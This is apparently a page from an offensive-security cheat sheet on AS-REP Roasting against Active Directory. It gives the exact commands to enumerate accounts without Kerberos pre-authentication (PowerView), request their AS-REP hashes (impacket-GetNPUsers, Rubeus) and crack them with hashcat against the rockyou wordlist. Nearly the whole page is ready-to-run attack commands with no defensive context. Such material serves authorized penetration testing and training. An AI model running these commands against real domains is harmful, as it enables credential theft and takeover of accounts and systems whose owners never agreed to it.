🧰AS-REP Roasting

First of all, a list of users AS-REP Roastable is mandatory.

Get-DomainUser -PreauthNotRequired

Then, use the right tool to get hashes.

Kali

impacket-GetNPUsers -dc-ip $DC_IP$ -request -outputfile hashes.asreproast $DOMAIN$/$USER$

Windows

.\Rubeus.exe asreproast /nowrap

Once hash extracted from Kali or Windows, need to use hashcat to crack it

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/base64.rule --force
PreviousPassword SprayingNextKerberoasting

Last updated